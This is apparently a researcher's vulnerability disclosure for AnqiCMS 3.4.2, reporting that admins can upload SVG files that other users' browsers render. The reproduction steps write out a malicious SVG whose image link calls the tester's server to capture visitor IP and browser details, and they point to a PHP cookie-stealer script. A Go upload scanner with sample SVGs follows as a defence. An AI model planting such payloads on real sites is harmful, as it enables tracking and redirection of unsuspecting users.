AnqiCMS | XSS via SVG image upload
Information
| Field | Value |
|---|---|
| Software Type | Web App |
| Software Name | Anqi CMS |
| Affected Version | 3.4.2 |
| Software Vendor | Fesiong |
| Software Link | https://github.com/fesiong/anqicms |
| Severity | Low |
| CVSS Score | 3.4 |
| CVE Link | N/A |
| Affected Assets | 100+ |
| Date of Discovery | Jan 8th, 2025 |
| PoC Exploit | N/A |
Description
AnqiCMS allows logged-in admins to upload files through the [/system/archive/attachment] endpoint. Files uploaded there can be displayed anywhere else on the site, to both users and admins.
I haven't been able to escalate this vulnerability to steal the bearer token from the custom HTTP header called “admin”, but it can still be used for redirecting users to malicious sites or grabbing their IP address and browser info.
Reproduce
To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.
Save the following file as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Launch a PHP server to serve this file:
> php -S 0.0.0.0:1718
Login to an admin account, navigate to [/system/archive/attachment] endpoint.
Create a malicious SVG file that sends an HTTP request to your server:
echo '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"><image href="http://127.0.0.1:1718/capture.php" width="100" height="100" /></svg>' > malicious.svg
Click on the “Upload new resources” button and select the file from your computer. Once uploaded, click on the file and a window will pop up showing the SVG's full path:
http://127.0.0.1:8001/uploads/202501/09/b1c301bf3778fd28.svg
Open this and watch your server for connections.
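As an added defensive example (written for this page, not AnqiCMS's own code), the Go check below is what an upload handler could run on an SVG before storing it: it rejects the external <image href> used in the steps above, along with script elements and on* event handlers. The two sample SVGs are constructed for the example.

```go
package main

import (
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// Constructed sample with the same shape as the SVG in the steps above: an <image href> to an external host.
const maliciousSVG = `<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"><image href="http://127.0.0.1:1718/capture.php" width="100" height="100" /></svg>`
// Constructed sample of a harmless SVG whose only reference is a same-document fragment.
const benignSVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><defs><circle id="c" r="4"/></defs><use href="#c" x="5" y="5"/></svg>`

// ScanSVG tokenises an uploaded SVG and returns why it should be rejected, or "" if it passed. It blocks
// <script>/<foreignObject>, on* attributes and any href (plain or xlink:) that is not a same-document fragment.
func ScanSVG(data []byte) string {
	dec := xml.NewDecoder(bytes.NewReader(data))
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return "" // reached the end without finding active content
		}
		if err != nil {
			return "not well-formed XML: " + err.Error()
		}
		se, ok := tok.(xml.StartElement)
		if !ok {
			continue // text, comments, directives and end tags carry no attributes
		}
		name := strings.ToLower(se.Name.Local)
		if name == "script" || name == "foreignobject" {
			return "forbidden element <" + name + ">"
		}
		for _, a := range se.Attr {
			attr := strings.ToLower(a.Name.Local) // Local matches both href and xlink:href
			if strings.HasPrefix(attr, "on") {
				return "event handler attribute " + attr
			}
			if attr == "href" && !strings.HasPrefix(strings.TrimSpace(a.Value), "#") {
				return "external reference in href: " + a.Value
			}
		}
	}
}

func main() {
	fmt.Printf("malicious: %q\nbenign: %q\n", ScanSVG([]byte(maliciousSVG)), ScanSVG([]byte(benignSVG)))
}
```

A blocklist like this is only a partial measure; serving uploads from a separate origin or with Content-Disposition: attachment stops the browser from rendering them in the site's context at all.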
Proof of Concept (PoC) Video
Posted on: May 24, 2025 02:16 AM